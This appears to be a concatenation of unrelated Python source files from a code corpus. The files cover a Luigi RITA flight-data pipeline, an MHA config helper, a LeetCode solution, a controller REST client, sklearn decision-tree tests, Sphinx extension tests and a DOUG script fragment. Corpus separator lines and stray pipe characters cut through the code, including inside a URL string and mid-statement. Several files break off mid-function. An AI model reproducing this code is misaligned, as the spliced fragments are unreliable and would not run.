        soup = BeautifulSoup(page.content, "lxml")
        # Each 'Download_Lookup' href is a catalog; its name follows '=L_'.
        for link in soup.find_all('a', href=re.compile('Download_Lookup')):
            catalog_name = link.get('href').split('=L_')[-1]
            catalog_url = '{}/{}'.format(baseurl, link.get('href'))
            yield DownloadCatalog(catalog_name=catalog_name, catalog_url=catalog_url)
class DownloadCatalog(luigi.Task):
    """
    Stream one lookup catalog from its URL into S3 as a CSV file.
    """
    catalog_url = luigi.Parameter()
    catalog_name = luigi.Parameter()
    root_path = luigi.Parameter()
    def run(self):
        logger.debug("Guardando en {} el catálogo {}".format(self.output().path, self.catalog_name))
        # Stream line-by-line so large catalogs are never fully in memory.
        with closing(requests.get(self.catalog_url, stream= True)) as response, \
             self.output().open('w') as output_file:
            for chunk in response.iter_lines(chunk_size=1024*8):
                if chunk:
                    output_file.write(chunk.decode('utf-8') + '\n')
    def output(self):
        output_path = '{}/catalogs/{}.csv'.format(self.root_path,
                                                  self.catalog_name)
        return luigi.s3.S3Target(path=output_path)
class DownloadRITAData(luigi.WrapperTask):
    """
    Yield one monthly download task per (year, month) from ``start_year``
    up to roughly 90 days before today (data lags by about a quarter).
    """
    start_year = luigi.IntParameter()
    def requires(self):
        today = datetime.date.today() + datetime.timedelta(days=-90)
        max_year = today.year
        max_month = today.month
        years = range(self.start_year, max_year)
        logger.info("Descargando datos de los años {}".format(years))
        for año in years:
            if año != max_year:
                months = range(1, 13)
            else:
                # Bug fix: this branch assigned 'month', leaving 'months'
                # undefined (NameError) when reached.
                # NOTE(review): 'years' currently excludes max_year, so this
                # branch is unreachable as written -- likely the range above
                # was meant to be range(self.start_year, max_year + 1).
                months = range(1, max_month + 1)
            for mes in months:
                yield DownloadRITAMonthlyData(year=año, month=mes)
class DownloadRITAMonthlyData(DockerTask):
    """
    Run the rita/download-rita docker image to fetch one month of RITA
    data into S3.
    """
    year = luigi.IntParameter()
    month = luigi.IntParameter()
    root_path = luigi.Parameter()
    raw_path = luigi.Parameter()
    @property
    def cmd(self):
        # NOTE(review): AWS credentials are interpolated into the shell
        # command line; they can leak via process listings and logs.
        return '''
        docker run --rm --env AWS_ACCESS_KEY_ID={} --env AWS_SECRET_ACCESS_KEY={} rita/download-rita --year {} --month {} --data_path {}/{}
        '''.format(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, self.year, self.month, self.root_path, self.raw_path)
    def output(self):
        return luigi.s3.S3Target(path='{}/{}/{}-{}.zip'.format(self.root_path,
                                                               self.raw_path,
                                                               str(self.month).zfill(2),
                                                               self.year))
class ExtractColumns(luigi.Task):
    """
    Read one monthly RITA zip from S3, keep the columns YEAR through
    DIV_AIRPORT_LANDINGS, and write them out pipe-separated (.psv).
    """
    task_name = "extract-columns"
    year = luigi.IntParameter()
    month = luigi.IntParameter()
    root_path = luigi.Parameter()
    bucket = luigi.Parameter()
    etl_path = luigi.Parameter()
    def requires(self):
        return DownloadRITA(year=self.year, month=self.month)
    def run(self):
        s3 = boto3.resource('s3')
        bucket = s3.Bucket(self.bucket)
        input_path = Path(self.input().path)
        obj = bucket.Object(str(input_path.relative_to('s3://{}'.format(self.bucket))))
        df = None
        with io.BytesIO(obj.get()["Body"].read()) as input_file:
            input_file.seek(0)
            with zipfile.ZipFile(input_file, mode='r') as zip_file:
                # The zip is expected to hold a single CSV; if there were
                # several, the last one read would win.
                for subfile in zip_file.namelist():
                    with zip_file.open(subfile) as file:
                        df = pd.read_csv(file)
        # (Restored 'write' and 'index=False', mangled in the source text.)
        with self.output().open('w') as output_file:
            output_file.write(df.loc[:, 'YEAR':'DIV_AIRPORT_LANDINGS'].to_csv(
                None,
                sep="|",
                header=True,
                index=False,
                encoding="utf-8",
                quoting=csv.QUOTE_ALL))
    def output(self):
        return luigi.s3.S3Target('{}/{}/{}/YEAR={}/{}.psv'.format(self.root_path,
                                                                  self.etl_path,
                                                                  self.task_name,
                                                                  self.year,
                                                                  str(self.month).zfill(2)))
class RTask(luigi.Task):
    # Smoke-test task: run the rita/test-r docker image against the shared
    # rita_store volume and expect it to drop a .psv file locally.
    root_path = luigi.Parameter()
    def requires(self):
        return RawData()
    def run(self):
        cmd = '''
        docker run --rm -v rita_store:/rita/data rita/test-r
        '''
        logger.debug(cmd)
        out = subprocess.check_output(cmd, shell=True)
        logger.debug(out)
    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_R.psv"))
class PythonTask(luigi.Task):
    # Smoke-test task: feed RTask's output through the rita/test-python
    # docker image, producing a JSON file in the local data directory.
    def requires(self):
        return RTask()
    def run(self):
        cmd = '''
        docker run --rm -v rita_store:/rita/data rita/test-python --inputfile {} --outputfile {}
        '''.format(os.path.join("/rita/data", os.path.basename(self.input().path)),
                   os.path.join("/rita/data", os.path.basename(self.output().path)))
        logger.debug(cmd)
        out = subprocess.call(cmd, shell=True)
        logger.debug(out)
    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_python.json"))
|
ovaistariq/mha-helper | mha_helper/config_helper.py | Python | gpl-3.0 | 8,633 | 0.00278 | # (c) 2015, Ovais Tariq <me@ovaistariq.net>
#
# This file is part of mha_helper
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import fnmatch
import os
import socket
import re
import ConfigParser
class ConfigHelper(object):
MHA_HELPER_CONFIG_DIR = '/etc/mha-helper'
MHA_HELPER_CONFIG_OPTIONS = ['writer_vip_cidr', 'vip_type', 'report_email', 'smtp_host', 'requires_sudo',
'super_read_only', 'requires_arping', 'cluster_interface', 'kill_after_timeout']
VIP_PROVIDER_TYPE_NONE = 'none'
VIP_PROVIDER_TYPE_METAL = 'metal'
VIP_PROVIDER_TYPE_AWS = 'aws'
VIP_PROVIDER_TYPE_OS = 'openstack'
VIP_PROVIDER_TYPES = [VIP_PROVIDER_TYPE_NONE, VIP_PROVIDER_TYPE_METAL, VIP_PROVIDER_TYPE_AWS, VIP_PROVIDER_TYPE_OS]
# This stores the configuration for every host
host_config = dict()
    @staticmethod
    def load_config():
        """Scan /etc/mha-helper for *.conf files and populate host_config.

        Every host section inherits options it does not define from its
        file's [default] section; 'writer_vip_cidr' and 'smtp_host' always
        come from [default].  Returns True on success, False on any missing
        section/option or failed validation.
        """
        pattern = '*.conf'
        if not os.path.exists(ConfigHelper.MHA_HELPER_CONFIG_DIR):
            return False
        for root, dirs, files in os.walk(ConfigHelper.MHA_HELPER_CONFIG_DIR):
            for filename in fnmatch.filter(files, pattern):
                config_file_path = os.path.join(ConfigHelper.MHA_HELPER_CONFIG_DIR, filename)
                print("Reading config file: %s" % config_file_path)
                config_parser = ConfigParser.RawConfigParser()
                config_parser.read(config_file_path)
                # Read the default config values first. The default config values are used when a config option is not
                # defined for the specific host
                if not config_parser.has_section('default'):
                    return False
                default_config = dict()
                for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
                    opt_value = config_parser.get('default', opt)
                    if not ConfigHelper.validate_config_value(opt, opt_value):
                        print("Parsing the option '%s' with value '%s' failed" % (opt, opt_value))
                        return False
                    default_config[opt] = opt_value
                # Setup host based configs. Initially hosts inherit config from the default section but override them
                # within their own sections
                for hostname in config_parser.sections():
                    ConfigHelper.host_config[hostname] = dict()
                    # We read the options from the host section of the config
                    for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
                        if config_parser.has_option(hostname, opt) and opt != 'writer_vip_cidr' and opt != 'smtp_host':
                            ConfigHelper.host_config[hostname][opt] = config_parser.get(hostname, opt)
                    # We now read the options from the default section and if any option has not been set by the host
                    # section we set that to what is defined in the default section, writer_vip_cidr is always read from
                    # the default section because it has to be global for the entire replication cluster
                    # If the option is not defined in both default and host section, we throw an error
                    for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
                        if (opt not in ConfigHelper.host_config[hostname] or opt == 'writer_vip_cidr' or
                                opt == 'smtp_host'):
                            # If the host section did not define the config option and the default config also does
                            # not define the config option then we bail out
                            if opt not in default_config:
                                print("Missing required option '%s'. The option should either be set in default "
                                      "section or the host section of the config" % opt)
                                return False
                            ConfigHelper.host_config[hostname][opt] = default_config[opt]
        # If no host configuration was found it is still an error as we may be analyzing empty files
        if len(ConfigHelper.host_config) < 1:
            return False
        return True
    @staticmethod
    def validate_config_value(config_key, config_value):
        """Validate a single option value by key.

        NOTE(review): returns None (falsy) for keys not handled below.
        """
        if config_key == 'writer_vip_cidr':
            return ConfigHelper.validate_ip_address(config_value)
        if config_key == 'vip_type':
            return config_value in ConfigHelper.VIP_PROVIDER_TYPES
        if config_key == 'report_email':
            return ConfigHelper.validate_email_address(config_value)
        if config_key == 'smtp_host':
            return ConfigHelper.validate_hostname(config_value)
        if config_key == 'kill_after_timeout':
            return ConfigHelper.validate_integer(config_value)
        if config_key == 'requires_sudo':
            return config_value in ['yes', 'no']
        if config_key == 'requires_arping':
            return config_value in ['yes', 'no']
        if config_key == 'cluster_interface':
            return config_value is not None and len(config_value) > 0
        if config_key == 'super_read_only':
            return config_value in ['yes', 'no']
    @staticmethod
    def validate_ip_address(ip_address):
        # Accept an IPv4 or IPv6 address; an optional '/prefix' (CIDR)
        # suffix is stripped before validation.
        try:
            socket.inet_pton(socket.AF_INET, ip_address.split('/')[0])
        except socket.error:
            try:
                socket.inet_pton(socket.AF_INET6, ip_address.split('/')[0])
            except socket.error:
                return False
            return True
        return True
@staticmethod
def validate_email_address(email_address):
pattern = '^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$'
return bool(re.match(pattern, email_address))
@staticmethod
def validate_integer(potential_integer):
try:
int(potential_integer)
except ValueError:
return False
return True
@staticmethod
def validate_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == ".":
| hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
if not all(allowed.match(x) for x in hostname.split(".")):
return False
# Now we try to resolve the hostname and error out if we cannot
try:
socket.gethostbyname(hostname)
except Exception as e:
print("Failed to resolve the hostname %s: %s" % (hostname, str(e) | ))
return False
return True
    def __init__(self, host):
        """Bind this helper to *host*; raises ValueError when the host has
        no loaded configuration (load_config() must have run first)."""
        self._host = host
        if host not in self.__class__.host_config:
            raise ValueError
        self._host_config = self.__class__.host_config[host]
    # --- Simple accessors over the per-host configuration dict ---
    def get_writer_vip(self):
        # Bare IP portion of the writer VIP (CIDR suffix stripped).
        return self.get_writer_vip_cidr().split('/')[0]
    def get_writer_vip_cidr(self):
        return self._host_config['writer_vip_cidr']
    def get_vip_type(self):
        return self._host_config['vip_type']
    def get_manage_vip(self):
        # VIP management is enabled for any provider type except 'none'.
        return self._host_config['vip_type'] != 'none'
    def get_report_email(self):
        return self._host_config['report_email']
    def get_smtp_host(self):
        return self._host_config['smtp_host']
    def get_kill_after_timeout(self):
        # Stored as a string in the config; exposed as an int.
        return int(self._host_config['kill_after_timeout'])
def get_requires_sudo(self):
if self._host |
class Solution(object):
    def maxArea(self, height):
        """
        Container With Most Water: the largest area of water bounded by
        two of the vertical lines.  (Restored the text mangled in the
        source.)

        :type height: List[int]
        :rtype: int
        """
        i = 0
        j = len(height) - 1
        res = 0
        # Two-pointer scan: the shorter side limits the area, so moving it
        # inward is the only way a better pair can exist.
        while i < j:
            res = max(res, min(height[i], height[j]) * (j - i))
            if height[i] > height[j]:
                j = j - 1
            else:
                i = i + 1
        return res
|
opennetworkinglab/spring-open-cli | cli/storeclient.py | Python | epl-1.0 | 15,736 | 0.005719 | #
# Copyright (c) 2010,2011,2012,2013 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#
# module: storeclient.py
#
# This module manages communication with the console, i.e. the REST interface
# of a Big Switch Controller node.
import urllib
import urllib2
import ftplib
import json
import datetime
import time
import traceback
import url_cache
class StringReader():
    """File-like ``read`` adapter over an in-memory string or an iterator
    of string chunks (used as a replacement for reading an existing file,
    e.g. for FTP uploads).

    String mode: ``read(size)`` honours ``size``; ``read()`` returns the
    remainder.  Iterator mode: ``read(size)`` returns at most ``size``
    characters per call (buffering partial chunks) and ``''`` at EOF.
    """
    def __init__(self, value):
        """
        Value can be a string, or a generator.
        """
        self.value = value
        self.offset = 0
        # u"".__class__ keeps Python 2 'unicode' support without naming it
        # (the bare name 'unicode' does not exist on Python 3).
        self.is_string = isinstance(value, (str, u"".__class__))
        if self.is_string:
            self.len = len(value)
        else:
            self.last = None  # unread tail of the most recent chunk

    def read(self, size=None):
        if self.is_string:
            if size is None:
                size = self.len - self.offset
            size = min(size, self.len - self.offset)
            # Fixed: the original sliced value[offset:size], which returned
            # '' as soon as offset reached size.
            result = self.value[self.offset:self.offset + size]
            self.offset += size
            return result
        # Iterator mode.
        if size is None:
            # Drain: buffered remainder plus all remaining chunks.
            parts = []
            if self.last is not None:
                parts.append(self.last[self.offset:])
                self.last = None
            parts.extend(self.value)
            return ''.join(parts)
        if self.last is not None:
            # Serve from the buffered remainder first.
            n = min(size, self.len - self.offset)
            result = self.last[self.offset:self.offset + n]
            self.offset += n
            if self.offset == self.len:
                self.last = None
            return result
        try:
            # Fixed: was 'value.next()' (NameError); next() also works on
            # both Python 2 and 3.
            item = next(self.value)
        except StopIteration:
            return ''  # EOF, file-like convention
        if len(item) <= size:
            return item
        # Buffer the unread tail for subsequent reads.
        self.last = item[size:]
        self.offset = 0
        self.len = len(self.last)
        return item[:size]
class StoreClient():
controller = None
display_rest = False
display_rest_reply = False
table_read_url = "http://%s/rest/v1/model/%s/"
entry_post_url = "http://%s/rest/v1/model/%s/"
user_data_url = "http://%s/rest/v1/d | ata/"
sdn_platform_data_url | = "http://%s/rest/v1/system/"
    def set_controller(self,controller):
        # Target controller as 'host:port'.
        self.controller = controller
    def display_mode(self, mode):
        # Toggle logging of outgoing REST requests.
        self.display_rest = mode
    def display_reply_mode(self, mode):
        # Toggle logging of REST replies.
        self.display_rest_reply = mode
    def set_sdn_controller_platform_rest_if(self, sdn_controller_rest_if):
        # POST the controller's REST interface address to the platform
        # 'restifaddr' endpoint.
        url = self.sdn_platform_data_url % (self.controller)
        url = url + "restifaddr/"
        data = self.rest_post_request(url, sdn_controller_rest_if)
    def rest_simple_request(self,url, use_cache = None, timeout = None):
        # GET 'url' and return the raw body, consulting/updating the URL
        # cache unless use_cache is explicitly False.
        # include a trivial retry mechanism ... other specific
        # urllib2 exception types may need to be included
        retry_count = 0
        if use_cache == None or use_cache:
            result = url_cache.get_cached_url(url)
            if result != None:
                return result
        # NOTE(review): retry_count is initialized to 0, so this retry loop
        # never executes (dead code as written).
        while retry_count > 0:
            try:
                return urllib2.urlopen(url, timeout = timeout).read()
            except urllib2.URLError:
                retry_count -= 1
                time.sleep(1)
        # try again without the try...
        if self.display_rest:
            print "REST-SIMPLE:", 'GET', url
        result = urllib2.urlopen(url, timeout = timeout).read()
        if self.display_rest_reply:
            print 'REST-SIMPLE: %s reply "%s"' % (url, result)
        url_cache.save_url(url, result)
        return result
def rest_json_request(self, url):
    """GET *url* and return the JSON-decoded body, memoized in url_cache."""
    cached = url_cache.get_cached_url(url)
    if cached != None:
        return cached
    # XXX check result
    decoded = json.loads(self.rest_simple_request(url))
    url_cache.save_url(url, decoded)
    return decoded
def rest_post_request(self, url, obj, verb='PUT'):
    """Send *obj* JSON-encoded to *url* with HTTP *verb*; return the reply body."""
    post_data = json.dumps(obj)
    if self.display_rest:
        print "REST-POST:", verb, url, post_data
    request = urllib2.Request(url, post_data, {'Content-Type':'application/json'})
    # urllib2 only knows GET/POST natively; override get_method to force
    # the requested verb (PUT, DELETE, ...).
    request.get_method = lambda: verb
    response = urllib2.urlopen(request)
    result = response.read()
    if self.display_rest_reply:
        print 'REST-POST: %s reply: "%s"' % (url, result)
    return result
def get_table_from_store(self, table_name, key=None, val=None, match=None):
    """Fetch rows of *table_name*, optionally filtered by key/val.

    *match* selects the Django-style lookup operator (default
    "startswith").  Decoded results are memoized in url_cache, keyed by
    the full query URL.  Returns None if no controller is configured.
    """
    if not self.controller:
        print "No controller specified. Set using 'controller <server:port>'."
        return
    url = self.table_read_url % (self.controller, table_name)
    if not match:
        match = "startswith"
    if key and val:
        url = "%s?%s__%s=%s" % (url, key, match, urllib.quote_plus(val))
    result = url_cache.get_cached_url(url)
    if result != None:
        return result
    data = self.rest_simple_request(url)
    entries = json.loads(data)
    url_cache.save_url(url, entries)
    return entries
def get_object_from_store(self, table_name, pk_value):
    """Fetch a single *table_name* row by primary key.

    Returns the decoded object, None on a non-200 reply, or None if no
    controller is configured.  Results are memoized in url_cache.
    """
    if not self.controller:
        print "No controller specified. Set using 'controller <server:port>'."
        return
    url = self.table_read_url % (self.controller, table_name)
    url += (pk_value + '/')
    result = url_cache.get_cached_url(url)
    if result != None:
        return result
    if self.display_rest:
        print "REST-MODEL:", url
    response = urllib2.urlopen(url)
    if response.code != 200:
        # LOOK! Should probably raise exception here instead.
        # In general we need to rethink the store interface and how
        # we should use exceptions.
        return None
    data = response.read()
    result = json.loads(data)
    if self.display_rest_reply:
        print 'REST-MODEL: %s reply: "%s"' % (url, result)
    url_cache.save_url(url, result)
    return result
# obj_data must contain a key/val and any other required data
def rest_create_object(self, obj_type, obj_data):
    """POST *obj_data* to create an *obj_type* entry.

    Returns the decoded error payload on failure, or None on the plain
    "saved" success reply (or when no controller is configured).
    """
    if not self.controller:
        print "No controller specified. Set using 'controller <server:port>'."
        return
    # Creation invalidates anything cached so far.
    url_cache.clear_cached_urls()
    url = self.entry_post_url % (self.controller, obj_type)
    data = self.rest_post_request(url, obj_data)
    # LOOK! successful stuff should be returned in json too.
    if data != "saved":
        result = json.loads(data)
        return result
    # NOTE(review): the cache is cleared a second time here; one of the
    # two clears is likely redundant.
    url_cache.clear_cached_urls()
def find_object_from_store(self, obj_type, key, val):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request("%s?%s__exact=%s" % (url, key, urllib.quote_plus(val)))
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
def rest_query_objects(self, obj_type, query_params=None):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
if query_params:
url += '?'
# Convert any data:None fields to <id>__isnull=True
non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
for (n,v) in query_params.items()])
url += urllib.urlencode(non_null_query_params)
result = url_cache.get_cached_url(url)
if result != None:
r |
seckcoder/lang-learn | python/sklearn/sklearn/tree/tests/test_tree.py | Python | unlicense | 15,491 | 0.001291 | """
Testing for the tree module (sklearn.tree).
"""
import numpy as np
from numpy.testing import assert_array_equal
from numpy.testing import assert_array_almost_equal
from numpy.testing import assert_almost_equal
from numpy.testing import assert_equal
from nose.tools import assert_raises
from nose.tools import assert_true
from sklearn import tree
from sklearn import datasets
# toy sample: two linearly separable classes in 2-D
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
# also load the iris dataset
# and randomly permute it (fixed seed for reproducibility)
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it (reuses the same RandomState)
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification_toy():
    """Check classification on a toy dataset."""
    # Plain tree first, then one restricted to a single (random) feature.
    for params in ({}, dict(max_features=1, random_state=1)):
        clf = tree.DecisionTreeClassifier(**params)
        clf.fit(X, y)
        assert_array_equal(clf.predict(T), true_result)
def test_regression_toy():
    """Check regression on a toy dataset."""
    # Plain tree first, then one restricted to a single (random) feature.
    for params in ({}, dict(max_features=1, random_state=1)):
        reg = tree.DecisionTreeRegressor(**params)
        reg.fit(X, y)
        assert_almost_equal(reg.predict(T), true_result)
def test_xor():
    """Check on a XOR problem"""
    # Build a 10x10 checkerboard-style XOR labelling over grid coordinates.
    labels = np.zeros((10, 10))
    labels[:5, :5] = 1
    labels[5:, 5:] = 1
    rows, cols = np.indices(labels.shape)
    data = np.vstack([rows.ravel(), cols.ravel()]).T
    labels = labels.ravel()
    # Both tree flavours, with and without feature subsampling, must fit XOR exactly.
    for factory in (tree.DecisionTreeClassifier, tree.ExtraTreeClassifier):
        for params in ({}, {'max_features': 1}):
            clf = factory(**params)
            clf.fit(data, labels)
            assert_equal(clf.score(data, labels), 1.0)
def test_graphviz_toy():
    """Check correctness of graphviz output on a toy dataset.

    Compares export_graphviz output byte-for-byte against golden dot
    text, with and without feature_names, then checks that a too-short
    feature_names list raises IndexError.
    """
    clf = tree.DecisionTreeClassifier(max_depth=3, min_samples_split=1)
    clf.fit(X, y)
    from StringIO import StringIO
    # test export code
    out = StringIO()
    tree.export_graphviz(clf, out_file=out)
    contents1 = out.getvalue()
    tree_toy = StringIO("digraph Tree {\n"
                        "0 [label=\"X[0] <= 0.0000\\nerror = 0.5"
                        "\\nsamples = 6\\nvalue = [ 3. 3.]\", shape=\"box\"] ;\n"
                        "1 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 3. 0.]\", shape=\"box\"] ;\n"
                        "0 -> 1 ;\n"
                        "2 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 0. 3.]\", shape=\"box\"] ;\n"
                        "0 -> 2 ;\n"
                        "}")
    contents2 = tree_toy.getvalue()
    assert contents1 == contents2, \
        "graphviz output test failed\n: %s != %s" % (contents1, contents2)
    # test with feature_names
    out = StringIO()
    out = tree.export_graphviz(clf, out_file=out,
                               feature_names=["feature1", ""])
    contents1 = out.getvalue()
    tree_toy = StringIO("digraph Tree {\n"
                        "0 [label=\"feature1 <= 0.0000\\nerror = 0.5"
                        "\\nsamples = 6\\nvalue = [ 3. 3.]\", shape=\"box\"] ;\n"
                        "1 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 3. 0.]\", shape=\"box\"] ;\n"
                        "0 -> 1 ;\n"
                        "2 [label=\"error = 0.0000\\nsamples = 3\\nvalue = [ 0. 3.]\", shape=\"box\"] ;\n"
                        "0 -> 2 ;\n"
                        "}")
    contents2 = tree_toy.getvalue()
    assert contents1 == contents2, \
        "graphviz output test failed\n: %s != %s" % (contents1, contents2)
    # test improperly formed feature_names: too short a list must raise
    out = StringIO()
    assert_raises(IndexError, tree.export_graphviz,
                  clf, out, feature_names=[])
def test_iris():
    """Check consistency on dataset iris."""
    for c in ('gini', 'entropy'):
        # Full feature set: high training accuracy expected.
        clf = tree.DecisionTreeClassifier(criterion=c)
        clf.fit(iris.data, iris.target)
        score = np.mean(clf.predict(iris.data) == iris.target)
        assert score > 0.9, "Failed with criterion " + c + \
            " and score = " + str(score)
        # Feature-subsampled tree: weaker, but still better than chance.
        clf = tree.DecisionTreeClassifier(criterion=c, max_features=2,
                                          random_state=1)
        clf.fit(iris.data, iris.target)
        score = np.mean(clf.predict(iris.data) == iris.target)
        assert score > 0.5, "Failed with criterion " + c + \
            " and score = " + str(score)
def test_boston():
    """Check consistency on dataset boston house prices."""
    for c in ('mse',):
        # Full feature set: training MSE must be tiny.
        reg = tree.DecisionTreeRegressor(criterion=c)
        reg.fit(boston.data, boston.target)
        score = np.mean(np.power(reg.predict(boston.data) - boston.target, 2))
        assert score < 1, "Failed with criterion " + c + \
            " and score = " + str(score)
        # Using fewer features reduces the learning ability of this tree,
        # but reduces training time.
        reg = tree.DecisionTreeRegressor(criterion=c, max_features=6,
                                         random_state=1)
        reg.fit(boston.data, boston.target)
        score = np.mean(np.power(reg.predict(boston.data) - boston.target, 2))
        assert score < 2, "Failed with criterion " + c + \
            " and score = " + str(score)
def test_probability():
    """Predict probabilities using DecisionTreeClassifier."""
    clf = tree.DecisionTreeClassifier(max_depth=1, max_features=1,
                                      random_state=42)
    clf.fit(iris.data, iris.target)
    proba = clf.predict_proba(iris.data)
    # Each row of predict_proba must sum to one.
    assert_array_almost_equal(np.sum(proba, 1), np.ones(iris.data.shape[0]))
    # The argmax of the probabilities must agree with predict() most of the time.
    agreement = np.mean(np.argmax(proba, 1) == clf.predict(iris.data))
    assert agreement > 0.9
    # predict_log_proba must be the log of predict_proba.
    assert_almost_equal(clf.predict_proba(iris.data),
                        np.exp(clf.predict_log_proba(iris.data)), 8)
def test_arrayrepr():
    """Check the array representation."""
    # Check resize: a deep tree on 10k points forces internal array growth.
    reg = tree.DecisionTreeRegressor(max_depth=None)
    targets = np.arange(10000)
    reg.fit(targets.reshape(-1, 1), targets)
def test_pure_set():
    """Check when y is pure."""
    data = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
    labels = [1, 1, 1, 1, 1, 1]
    # A single-class target must be reproduced exactly by both tree flavours.
    for factory in (tree.DecisionTreeClassifier, tree.DecisionTreeRegressor):
        model = factory().fit(data, labels)
        assert_array_equal(model.predict(data), labels)
def test_numerical_stability():
    """Check numerical stability."""
    features = np.array([
        [152.08097839, 140.40744019, 129.75102234, 159.90493774],
        [142.50700378, 135.81935120, 117.82884979, 162.75781250],
        [127.28772736, 140.40744019, 129.75102234, 159.90493774],
        [132.37025452, 143.71923828, 138.35694885, 157.84558105],
        [103.10237122, 143.71928406, 138.35696411, 157.84559631],
        [127.71276855, 143.71923828, 138.35694885, 157.84558105],
        [120.91514587, 140.40744019, 129.75102234, 159.90493774]])
    targets = np.array(
        [1., 0.70209277, 0.53896582, 0., 0.90914464, 0.48026916, 0.49622521])
    # Promote any floating point warning to an error while fitting on every
    # sign combination; the context manager restores the old error state.
    with np.errstate(all="raise"):
        dt = tree.DecisionTreeRegressor()
        for data, values in ((features, targets), (features, -targets),
                             (-features, targets), (-features, -targets)):
            dt.fit(data, values)
def test_importances():
"""Check variable importances."""
X, y = datasets.make_classification(n_samples=1000,
n_features=10,
n_informative=3,
n_redundant=0,
|
lsst-sqre/sphinxkit | tests/test_sphinxext_mockcoderefs.py | Python | mit | 1,652 | 0 | """Tests for documenteer.sphinext.mockcoderefs."""
from shutil import rmtree
from tempfile import mkdtemp
import pytest
from sphinx.application import Sphinx
import documenteer.sphinxext.mockcoderefs as mockcoderefs
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock
@pytest.fixture()
def app(request):
    """Build a throwaway Sphinx application with mockcoderefs installed.

    All four Sphinx directories are fresh temp dirs, removed via a
    pytest finalizer on teardown.
    """
    src = mkdtemp()
    doctree = mkdtemp()
    confdir = mkdtemp()
    outdir = mkdtemp()
    # Silence Sphinx's status output for the duration of the tests.
    Sphinx._log = lambda self, message, wfile, nonl=False: None
    app = Sphinx(
        srcdir=src,
        confdir=None,
        outdir=outdir,
        doctreedir=doctree,
        buildername="html",
    )
    mockcoderefs.setup(app)
    # Stitch together as the sphinx app init() usually does w/ real conf files
    try:
        app.config.init_values()
    except TypeError:
        # Sphinx < 1.6.0: init_values required a logger callback argument.
        app.config.init_values(Sphinx._log)
    def fin():
        # Remove every temp dir created above.
        for dirname in (src, doctree, confdir, outdir):
            rmtree(dirname)
    request.addfinalizer(fin)
    return app
@pytest.fixture()
def inliner(app):
    """A stub docutils inliner whose document.settings.env.app is *app*."""
    env = Mock(app=app)
    return Mock(document=Mock(settings=Mock(env=env)))
@pytest.mark.parametrize(
    "test_input,expected",
    [
        (("lmod", "lsst.afw"), "lsst.afw"),
        (("lmod", "~lsst.afw"), "afw"),
        (("lmod", "~lsst"), "lsst"),
    ],
)
def test_mock_code_ref_role(inliner, test_input, expected):
    """The role renders its (possibly ~-abbreviated) target as plain text."""
    role_name, role_content = test_input
    nodes_and_messages = mockcoderefs.mock_code_ref_role(
        name=role_name,
        rawtext=role_content,
        text=role_content,
        inliner=inliner,
        lineno=None,
    )
    # First returned node must render the expected (shortened) name.
    assert nodes_and_messages[0][0].astext() == expected
|
ogbash/doug | scripts/doug/execution.py | Python | lgpl-2.1 | 8,926 | 0.004593 | import subprocess
import re
import copy
from StringIO import StringIO
import os
import doug
from doug.config import DOUGConfigParser, ControlFile
from scripts import ScriptException
import logging
LOG = logging.getLogger('doug')
_defaultConfig = None
def getDefaultConfig():
    """Return the process-wide default DOUG configuration, built lazily."""
    global _defaultConfig
    if _defaultConfig is not None:
        return _defaultConfig
    # First call: build the parser from the bundled template and cache it.
    _defaultConfig = DOUGConfigParser(name="DOUG default config")
    _defaultConfig.addConfigContents(doug.execution_conf_tmpl)
    return _defaultConfig
def getDefaultControlFile(basedir):
    """Build a ControlFile from the bundled DOUG control template."""
    control = ControlFile(contents=doug.DOUG_ctl_tmpl, basedir=basedir)
    control.name = '<doug.DOUG_ctl_tmpl>'
    return control
class DOUGExecution:
def __init__(self, config, dougControls=None):
    """Layer default config, default controls, *dougControls* and *config*
